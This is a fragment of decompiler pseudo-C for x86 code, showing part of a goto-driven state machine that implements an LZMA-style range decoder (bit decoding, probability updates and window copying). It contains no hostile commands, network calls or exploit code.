                                                                                                                                                                            											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            											L90:
                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                            											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            											goto L69;
                                                                                                                                                                            										case 0xc:
                                                                                                                                                                            											L99:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												L164:
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L100:
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t334 = __ebp - 0x70;
                                                                                                                                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t334;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            											goto L101;
                                                                                                                                                                            										case 0xd:
                                                                                                                                                                            											L37:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												L159:
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L38:
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t122 = __ebp - 0x70;
                                                                                                                                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t122;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L39:
                                                                                                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                                                                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                            												goto L48;
                                                                                                                                                                            											}
                                                                                                                                                                            											L40:
                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                            												goto L54;
                                                                                                                                                                            											}
                                                                                                                                                                            											L41:
                                                                                                                                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                            											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                            											__eax = __eax << 8;
                                                                                                                                                                            											__eax = __eax + __ebx;
                                                                                                                                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            											__edx = __ax & 0x0000ffff;
                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                            												 *(__ebp - 0x40) = 1;
                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            												0x800 = 0x800 - __edx;
                                                                                                                                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L39;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												L45:
                                                                                                                                                                            												goto L37;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0xe:
                                                                                                                                                                            											L46:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												L160:
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L47:
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t156 = __ebp - 0x70;
                                                                                                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t156;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												L48:
                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                            													break;
                                                                                                                                                                            												}
                                                                                                                                                                            												L49:
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                                                                                                            													__ebx = _t170;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													continue;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													L53:
                                                                                                                                                                            													goto L46;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											L54:
                                                                                                                                                                            											_t173 = __ebp - 0x34;
                                                                                                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                            											__eflags =  *_t173;
                                                                                                                                                                            											goto L55;
                                                                                                                                                                            										case 0xf:
                                                                                                                                                                            											L58:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												L161:
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L59:
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t203 = __ebp - 0x70;
                                                                                                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t203;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L60:
                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                            												L55:
                                                                                                                                                                            												__al =  *(__ebp - 0x44);
                                                                                                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                            												goto L56;
                                                                                                                                                                            											}
                                                                                                                                                                            											L61:
                                                                                                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                                                                                                            											__edx = __ebx + __ebx;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            											__esi = __edx + __eax;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                                                                                                            												__ebx = _t217;
                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            												0x800 = 0x800 - __edi;
                                                                                                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L60;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												L65:
                                                                                                                                                                            												goto L58;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0x10:
                                                                                                                                                                            											L109:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												L165:
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L110:
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t365 = __ebp - 0x70;
                                                                                                                                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t365;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											goto L111;
                                                                                                                                                                            										case 0x11:
                                                                                                                                                                            											L69:
                                                                                                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                            											goto L132;
                                                                                                                                                                            										case 0x12:
                                                                                                                                                                            											L128:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												L131:
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                            												L132:
                                                                                                                                                                            												 *(_t644 - 0x54) = _t642;
                                                                                                                                                                            												goto L133;
                                                                                                                                                                            											}
                                                                                                                                                                            											L129:
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            											__eflags = __eax;
                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                            											goto L130;
                                                                                                                                                                            										case 0x13:
                                                                                                                                                                            											L141:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												L143:
                                                                                                                                                                            												_t469 = __ebp - 0x58;
                                                                                                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                            												__eflags =  *_t469;
                                                                                                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                                                                                                            												L144:
                                                                                                                                                                            												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                                                                                                            												L145:
                                                                                                                                                                            												 *(_t644 - 0x50) = 1;
                                                                                                                                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                            												goto L149;
                                                                                                                                                                            											}
                                                                                                                                                                            											L142:
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                            											L130:
                                                                                                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            											 *(__ebp - 0x40) = 3;
                                                                                                                                                                            											goto L144;
                                                                                                                                                                            										case 0x14:
                                                                                                                                                                            											L156:
                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												L140:
                                                                                                                                                                            												 *(_t644 - 0x88) = _t537;
                                                                                                                                                                            												goto L1;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0x15:
                                                                                                                                                                            											L91:
                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            											__al = __al & 0x000000fd;
                                                                                                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            											goto L120;
                                                                                                                                                                            										case 0x16:
                                                                                                                                                                            											goto L0;
                                                                                                                                                                            										case 0x17:
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												L145:
                                                                                                                                                                            												 *(_t644 - 0x50) = 1;
                                                                                                                                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                            												goto L149;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0x18:
                                                                                                                                                                            											goto L146;
                                                                                                                                                                            										case 0x19:
                                                                                                                                                                            											L94:
                                                                                                                                                                            											__eflags = __ebx - 4;
                                                                                                                                                                            											if(__ebx < 4) {
                                                                                                                                                                            												L98:
                                                                                                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                            												L119:
                                                                                                                                                                            												_t393 = __ebp - 0x2c;
                                                                                                                                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                            												__eflags =  *_t393;
                                                                                                                                                                            												L120:
                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												if(__eax == 0) {
                                                                                                                                                                            													L166:
                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												L121:
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												}
                                                                                                                                                                            												L122:
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                            												_t400 = __ebp - 0x60;
                                                                                                                                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                            												__eflags =  *_t400;
                                                                                                                                                                            												goto L123;
                                                                                                                                                                            											}
                                                                                                                                                                            											L95:
                                                                                                                                                                            											__ecx = __ebx;
                                                                                                                                                                            											__eax = __ebx;
                                                                                                                                                                            											__ecx = __ebx >> 1;
                                                                                                                                                                            											__eax = __ebx & 0x00000001;
                                                                                                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                            											__al = __al | 0x00000002;
                                                                                                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                            											__eflags = __ebx - 0xe;
                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            											if(__ebx >= 0xe) {
                                                                                                                                                                            												L97:
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                            												L102:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            													L107:
                                                                                                                                                                            													__eax = __eax + __ebx;
                                                                                                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													L108:
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                                                                                                            													L112:
                                                                                                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                            														L118:
                                                                                                                                                                            														_t391 = __ebp - 0x2c;
                                                                                                                                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                            														__eflags =  *_t391;
                                                                                                                                                                            														goto L119;
                                                                                                                                                                            													}
                                                                                                                                                                            													L113:
                                                                                                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                            													__esi = __edi + __eax;
                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                            														__ecx = 0;
                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                            														__ecx = 1;
                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            														__ebx = 1;
                                                                                                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                            														__ebx = 1 << __cl;
                                                                                                                                                                            														__ecx = 1 << __cl;
                                                                                                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                            														__eax = __eax - __ecx;
                                                                                                                                                                            														__edi = __edi + 1;
                                                                                                                                                                            														__eflags = __edi;
                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                            														0x800 = 0x800 - __ecx;
                                                                                                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            														 *__esi = __dx;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            														L111:
                                                                                                                                                                            														_t368 = __ebp - 0x48;
                                                                                                                                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                            														__eflags =  *_t368;
                                                                                                                                                                            														goto L112;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														L117:
                                                                                                                                                                            														goto L109;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												L103:
                                                                                                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                                                                                                            													__eflags = __ebx;
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													L101:
                                                                                                                                                                            													_t338 = __ebp - 0x48;
                                                                                                                                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            													__eflags =  *_t338;
                                                                                                                                                                            													goto L102;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													L106:
                                                                                                                                                                            													goto L99;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											L96:
                                                                                                                                                                            											__edx =  *(__ebp - 4);
                                                                                                                                                                            											__eax = __eax - __ebx;
                                                                                                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                            											goto L108;
                                                                                                                                                                            										case 0x1a:
                                                                                                                                                                            											L56:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            												L162:
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L57:
                                                                                                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                            											__eax = __ecx + 1;
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            											__edx = _t192;
                                                                                                                                                                            											goto L80;
                                                                                                                                                                            										case 0x1b:
                                                                                                                                                                            											L76:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            												L163:
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L77:
                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            											}
                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                            											__cl =  *(__eax + __edx);
                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            											 *(__eax + __edx) = __cl;
                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            											__edx = _t275;
                                                                                                                                                                            											__eax =  *(__ebp - 0x68);
